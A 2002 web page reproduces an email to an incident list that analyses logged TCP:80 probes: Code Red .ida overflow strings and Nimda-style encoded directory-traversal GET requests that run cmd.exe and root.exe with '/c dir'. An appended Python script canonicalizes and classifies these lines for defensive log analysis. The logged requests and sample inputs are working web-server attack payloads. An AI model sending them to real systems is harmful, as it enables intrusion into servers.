TCP:80 payloads

An email to intrusions@incidents.org, based upon some study of the first few days of probes to TCP:80 monitored by ACK_hole


From jsage@finchhaven.com Tue Aug 13 12:06:05 2002
Date: Tue, 13 Aug 2002 12:06:05 -0700
From: John Sage 
To: intrusions@incidents.org
Subject: Notes on packet payloads in probes to TCP:80
Message-ID: <20020813120605.L1658@finchhaven.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i

Now that ACK_hole lets me see packet payloads, here are some notes on
what snort 1.8.7 is logging in the very common probes to TCP:80 (http).

Over a *very* brief timeframe, probes seem to come in three forms:

1) One variant is almost always 16 packets for the entire transaction,
and contains one packet with a GET, and a second packet with the
infamous /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNN...

Count: roughly 8


2) The second variant is almost always 144 packets for the entire
transaction, and contains packets, in this order, of the form:

Count: roughly 9

GET /scripts/root.exe?/c+dir
GET /MSADC/root.exe?/c+dir
GET /c/winnt/system32/cmd.exe?/c+dir
GET /d/winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir r 
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir c+dir
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir c+dir
GET /msadc/..%5c../..%5c../..%5c/..55../..c1../../.../winnt/system32/cmd.exe?/c+dir 32/cmd.exe?/c+dir
GET /scripts/..%c../winnt/system32/cmd.exe?/c+dir dir
GET /scripts/..%c../winnt/system32/cmd.exe?/c+dir dir
GET /scripts/..%c../winnt/system32/cmd.exe?/c+dir dir 
GET /scripts/..%c../winnt/system32/cmd.exe?/c+dir dir 
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir dir 
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir r
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir c+dir
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir r 

(decoder: 0x5C = "\"; 0x55 = "U"; 0xc1 = "A-tilde"?; 0xC is not any
ASCII character; 0x2F = "/" )

And each of these end with some variation on:

HTTP/1.0..Host: www..Connnection: close....

snort 1.8.7 logs all of these at right about 51-42k


3) The third variant is somewhat like the second, but shorter, and of
less consistent packet count. More like a "some of the above" with
variations. They almost seem hand-crafted, perhaps..

Count: roughly 3

Some examples:

From 217.227.238.18:

GET /scripts/..%c../winnt/system32/cmd.exe?/c+dir+c:\ c:\ 
GET /scripts/..%c../winnt/system32/cmd.exe?/c+dir+c:\ c:\ 
GET /scripts/..%c../winnt/system32/cmd.exe?/c+dir+c:\ c:\
GET /scripts/.%2e/.%2e/winnt/system32/cmd.exe?/c+dir+c:\ c:\
GET /scripts/.%2e/.%2e/winnt/system32/cmd.exe?/c+dir+c:\ c:\ 
GET /scripts/.%2e/.%2e/winnt/system32/cmd.exe?/c+dir+c:\ c:\ 

0x2E is a dot.. 0xC is nothing more than 0000 1100 binary...


Here's three-of-a-kind:

From 65.198.208.56:

GET /scripts/..%5c%5c../winnt/system32/cmd.exe?/c+dir..ir..


From 193.251.152.91:

GET /scripts/..%5c%5c../winnt/system32/cmd.exe?/c+dir..ir..


From 216.181.16.2:

GET /scripts/..%5c%5c../winnt/system32/cmd.exe?/c+dir..ir..


Is this some kind of distinct tool, or some clown trying to do it by
hand?



Interesting...

- John
-- 
Most people don't type their own logfiles;  but, what do I care?

PGP key:     http://www.finchhaven.com/pages/gpg_pubkey.html
Fingerprint: C493 9F26 05A9 6497 9800  4EF6 5FC8 F23D 35A4 F705
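The request lines quoted in the email above only look different before decoding: once %5c, %2f, %2e, the doubled "%%35c" form and the raw 0xC0/0xC1 byte pairs are reduced the way IIS reduced them, every cmd.exe probe collapses to the same escape out of the web root. The script below is an added example for this page, not part of John Sage's email, ACK_hole or snort. It canonicalizes a request line, classifies it as the Code Red .ida overflow, a traversal to cmd.exe, or a probe for the root.exe copy and /c, /d drive mappings left by an earlier Code Red II infection, and pulls out the command handed to cmd.exe. The sample lines are constructed for the example: most are copied from the email; the raw-byte and %%35c forms are taken from the Nimda request list in CERT advisory CA-2001-26, and reading the dump's "..%c../" and "..c1../" lines as those 0xC0/0xC1 sequences is an assumption. The two-byte decoder is a model of the lenient decoding those sequences rely on, not IIS code.

```python
"""Canonicalize and classify the TCP:80 probe request lines quoted above.

Added example for this page; not part of John Sage's email, ACK_hole or snort.
"""
import re
from urllib.parse import unquote_to_bytes


def overlong_decode(data: bytes) -> bytes:
    """Model (an assumption, not IIS source) of the lenient two-byte UTF-8
    decode behind the "unicode" traversal: a 0xC0/0xC1 lead byte and the byte
    after it are folded into one character with no check of the 10xxxxxx
    continuation prefix.  C0 AF -> '/', C1 9C -> '\\', C1 1C -> '\\', C0 2F -> '/'."""
    out = bytearray()
    i = 0
    while i < len(data):
        if data[i] in (0xC0, 0xC1) and i + 1 < len(data):
            out.append((data[i] & 0x1F) << 6 | (data[i + 1] & 0x3F))
            i += 2
        else:
            out.append(data[i])
            i += 1
    return bytes(out)


def canonicalize(path: bytes) -> str:
    """Decode twice (the superfluous second decode is what %%35c and %255c
    rely on), fold backslash to slash, resolve . and .. segments.  Segments
    that climb above the root are kept as a leading ".." so the escape
    stays visible in the result."""
    for _ in range(2):
        path = overlong_decode(unquote_to_bytes(path))
    stack = []
    for seg in path.replace(b"\\", b"/").split(b"/"):
        if seg in (b"", b"."):
            continue
        if seg == b"..":
            if stack and stack[-1] != b"..":
                stack.pop()
            else:
                stack.append(b"..")
        else:
            stack.append(seg)
    return "/" + "/".join(s.decode("latin-1") for s in stack)


def classify(request_line: bytes) -> dict:
    """Return {"variant", "path", "command"} for one logged request line."""
    m = re.match(rb"(GET|HEAD|POST)\s+(\S+)", request_line)
    if not m:
        return {"variant": "not-http", "path": "", "command": ""}
    path, _, query = m.group(2).partition(b"?")
    canon = canonicalize(path).lower()
    # "?/c+dir+c:\" is cmd.exe's "/c <command>" with '+' standing for space.
    qtext = unquote_to_bytes(query.replace(b"+", b" ")).decode("latin-1")
    command = qtext[3:].strip() if qtext.lower().startswith("/c ") else ""
    if canon.endswith("/default.ida") and re.match(rb"[nx]{16,}", query, re.I):
        variant = "code-red"            # .ida ISAPI overflow, variant 1 above
    elif canon.endswith("/cmd.exe") and canon.startswith("/.."):
        variant = "unicode-traversal"   # escapes the web root to reach cmd.exe
    elif canon.endswith(("/root.exe", "/cmd.exe")):
        variant = "backdoor-probe"      # root.exe copy or /c, /d vdirs left by Code Red II
    else:
        variant = "other"
    return {"variant": variant, "path": canon, "command": command}


# Constructed sample input: lines from the email plus raw-byte and %%35c forms
# from the Nimda list in CERT CA-2001-26 (those bytes print as "." in a dump).
SAMPLE_LINES = [
    b"GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN HTTP/1.0",
    b"GET /scripts/root.exe?/c+dir HTTP/1.0",
    b"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    b"GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    b"GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    b"GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    b"GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    b"GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    b"GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    b"GET /scripts/.%2e/.%2e/winnt/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0",
    b"GET /scripts/..%5c%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    b"GET /index.html HTTP/1.0",
]


def summarize(lines):
    """Count request lines per variant, the way the email tallies probes."""
    counts = {}
    for line in lines:
        v = classify(line)["variant"]
        counts[v] = counts.get(v, 0) + 1
    return counts


if __name__ == "__main__":
    for line in SAMPLE_LINES:
        r = classify(line)
        print(f"{r['variant']:18} {r['path']:32} {r['command']}")
    print(summarize(SAMPLE_LINES))
```

Run as-is it prints one classified line per request and the per-variant tally. To feed it real payload dumps, take the request bytes from the hex column: an ASCII-only dump has already replaced the 0xC0/0xC1 pairs with "." and the overlong forms cannot be recovered from it.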

This page last preened by Webmaster jsage@finchhaven.com on:
Last modified: Tue Aug 13 12:12:43 2002